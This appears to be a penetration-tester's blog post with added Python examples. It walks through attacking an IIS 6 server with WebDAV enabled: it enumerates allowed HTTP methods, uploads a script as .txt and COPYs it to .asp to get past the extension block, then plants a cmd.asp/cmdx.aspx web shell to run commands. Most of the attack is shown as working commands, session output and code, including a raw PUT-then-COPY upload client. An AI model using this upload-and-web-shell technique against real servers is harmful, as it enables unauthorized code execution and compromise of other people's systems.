Basically I wanted to do:
cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private
cg@segfault:~/evil/msf3$
but with a Metasploit auxiliary module. So I got it going... mostly HD's module, but I changed what needed to be changed to get it to work.
cg@segfault:~/evil/msf3$ ./msfconsole
=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux
msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >
I'll post the code on carnal0wnage when I get off my butt, plus a little something something that gives you a status if you are scanning a Class C.
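An added example of the same probe in Python (not the Metasploit module from the post, which is not on this page): it sends the `OPTIONS * HTTP/1.0` request typed into netcat above, parses the Allow/Public headers, and flags the write/WebDAV methods. The `RISKY` set and the report format are my choices; the sample response is the IIS 6.0 header block from the post, embedded so the parser runs offline.

```python
"""HTTP OPTIONS method enumerator (added example, not the Metasploit module from the post).

Sends the same 'OPTIONS * HTTP/1.0' probe typed into netcat above, then parses
the Allow/Public headers and flags the write/WebDAV methods (PUT, COPY, MOVE,
DELETE, ...) that make a box worth a closer look.
"""
import socket

# Methods that let a client change content or that are otherwise worth flagging (my choice).
RISKY = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK", "SEARCH", "TRACE"}


def build_options_request(host, http_version="1.0"):
    """Raw request bytes. Every line ends in CRLF and a blank line closes the headers."""
    lines = [f"OPTIONS * HTTP/{http_version}"]
    if http_version == "1.1":
        lines.append(f"Host: {host}")  # Host is mandatory in HTTP/1.1
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_methods(raw):
    """Return (status_code, server_banner, sorted method list) from a raw HTTP response."""
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0].decode("latin-1")
    status_line, *header_lines = head.split("\n")
    code = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    methods = set()
    for name in ("allow", "public"):  # IIS 6 sends both; most servers only send Allow
        methods.update(m.strip().upper() for m in headers.get(name, "").split(",") if m.strip())
    return code, headers.get("server", ""), sorted(methods)


def scan(host, port=80, timeout=5.0):
    """Live probe: connect, send OPTIONS, read until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_options_request(host))
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return parse_methods(b"".join(chunks))


def report(host, methods):
    """One-line summary in the style of the module output above."""
    line = f"[*] {host} allows {', '.join(methods)} methods"
    risky = sorted(RISKY & set(methods))
    if risky:
        line += f" [write/WebDAV: {', '.join(risky)}]"
    return line


# Constructed sample: the IIS 6.0 headers from the post, embedded so this runs offline.
SAMPLE_IIS = (
    b"HTTP/1.1 200 OK\r\n"
    b"Connection: close\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"DAV: 1,2\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    code, server, methods = parse_methods(SAMPLE_IIS)
    print(server, code)
    print(report("192.168.0.109", methods))
    # Against a live host: print(report(host, scan(host)[2]))
```

The parser reads both Allow and Public because IIS 6 emits both; on most servers only Allow is present. The request is built with explicit CRLF pairs, which matters once you go past netcat and start scripting this: a bare LF after the request line is exactly the kind of thing that gets you a 400.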
**more on getting code on the box once you find a PUT
curl -T issues an HTTP PUT of the local file to the URL you give it:
cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt
Then you have to do a MOVE or COPY request, because the server refuses a direct PUT of a .asp file but accepts a .txt that you can then rename. Personally I was having issues getting a MOVE request to work with a netcat connection, so I used...
**UPDATE
It ended up being the carriage returns (or lack thereof) that were causing me to get a 400 Bad Request error. I couldn't get the MOVE command to work, but the COPY command did.
cadaver (http://www.webdav.org/cadaver/):
cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed: 404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit
From there you will want to upload your cmd.asp so you can execute commands on the box.
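The PUT-then-COPY sequence from the cadaver session above, as an added example that is not the post's own code and not IIS: a raw-socket client that builds each request by hand (CRLF line endings and a blank line after the headers, the framing that caused the 400 Bad Request in the UPDATE), plus a small stand-in server that only models the behaviour the post shows (PUT of a .asp name refused with 404, PUT of a .txt accepted, COPY with a Destination header producing the .asp). The server, the status codes it returns and the `upload_via_copy` helper are my assumptions for the demo.

```python
"""Raw WebDAV PUT-then-COPY upload, with a local stand-in server.

Added example: not the post's cadaver session and not IIS. The stand-in
server only models the behaviour shown above (PUT of a .asp name is refused,
PUT of a .txt works, COPY with a Destination header produces the .asp). The
client builds every request by hand with CRLF line endings and a blank line
after the headers, the framing detail behind the 400 Bad Request in the UPDATE.
"""
import os
import socket
import tempfile
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

CRLF = "\r\n"


def build_request(method, host, path, headers=None, body=b""):
    """Raw HTTP/1.1 request bytes: request line, headers, empty line, body."""
    hdrs = {"Host": host, "Content-Length": str(len(body)), "Connection": "close"}
    hdrs.update(headers or {})
    head = f"{method} {path} HTTP/1.1{CRLF}" + "".join(f"{k}: {v}{CRLF}" for k, v in hdrs.items()) + CRLF
    return head.encode() + body


def build_put(host, path, body):
    return build_request("PUT", host, path, body=body)


def build_copy(host, src, dst, overwrite=True):
    # RFC 4918: COPY names the target as an absolute URI in Destination; Overwrite: F keeps an existing target.
    return build_request("COPY", host, src,
                         {"Destination": f"http://{host}{dst}", "Overwrite": "T" if overwrite else "F"})


def send_raw(host, port, data, timeout=5.0):
    """Send bytes, read until the server closes, return the numeric status code."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
        resp = b""
        while chunk := s.recv(4096):
            resp += chunk
    return int(resp.split(b" ", 2)[1])


class FakeDavHandler(BaseHTTPRequestHandler):
    """Assumed stand-in for the IIS 6 behaviour in the post; not a real WebDAV implementation."""
    root = tempfile.mkdtemp()
    blocked = (".asp", ".aspx")  # script extensions the server will not accept via PUT

    def _local(self, url_or_path):
        # basename() keeps the demo inside its temp dir whatever path the client sends
        return os.path.join(self.root, os.path.basename(urlparse(url_or_path).path))

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))  # drain before answering
        if self.path.lower().endswith(self.blocked):
            self.send_response(404)  # IIS answered the .asp PUT with 404 Not Found
        else:
            with open(self._local(self.path), "wb") as f:
                f.write(body)
            self.send_response(201)
        self.end_headers()

    def do_COPY(self):
        dst = self.headers.get("Destination")
        src = self._local(self.path)
        if not dst or not os.path.exists(src):
            self.send_response(404)
        elif os.path.exists(self._local(dst)) and self.headers.get("Overwrite", "T") == "F":
            self.send_response(412)  # Precondition Failed
        else:
            with open(src, "rb") as s, open(self._local(dst), "wb") as d:
                d.write(s.read())
            self.send_response(201)
        self.end_headers()

    def log_message(self, *args):
        pass


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), FakeDavHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def stored_files():
    return sorted(os.listdir(FakeDavHandler.root))


def upload_via_copy(host, port, name, content):
    """The post's trick: direct PUT (refused), PUT as .txt, COPY to the real name. Returns the three status codes."""
    direct = send_raw(host, port, build_put(host, f"/{name}", content))
    staged = send_raw(host, port, build_put(host, f"/{name}.txt", content))
    copied = send_raw(host, port, build_copy(host, f"/{name}.txt", f"/{name}"))
    return direct, staged, copied


if __name__ == "__main__":
    srv = start_server()
    print(upload_via_copy("127.0.0.1", srv.server_port, "upload.asp", b'<% Response.Write("hi") %>'))
    print(stored_files())
    srv.shutdown()
```

Against a real target you would drop the stand-in server and point `send_raw` at the host, keeping the same request builders. The only thing the client does differently from a hand-typed netcat session is guarantee the CRLF framing on every line, which is the whole reason the cadaver detour was needed in the post.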
Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVsJtExeOABpCUvVQXMEa_iBai0XV49xb6CUH3RjQljC1ZXYPEvaYGPAicfuXLoYGN-luAX8m8G4l6mdWd-KduSOTSxsWxQUr3ulAFlHvHLJ390Zjj8NbiQCxLwW6SRmL1eDkWxUL-VVk/s400/upload-asp.jpg)
Interacting with our cmdx.aspx to list the directory contents of the C drive
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMO4W5eE3cJOK0IBKeKTnsslnXFo6BCFjR7D6UxA6xteacKc8BnpyRR5U8ZcsL3PQq7z-PysQEWYQK9IqwLGh95uAsVr22s4hWotQl9oYpgjxN70UTWFhIavuCNh9wRoN9gYZxmxkmSj8/s400/cmdx-aspx.jpg)
-CG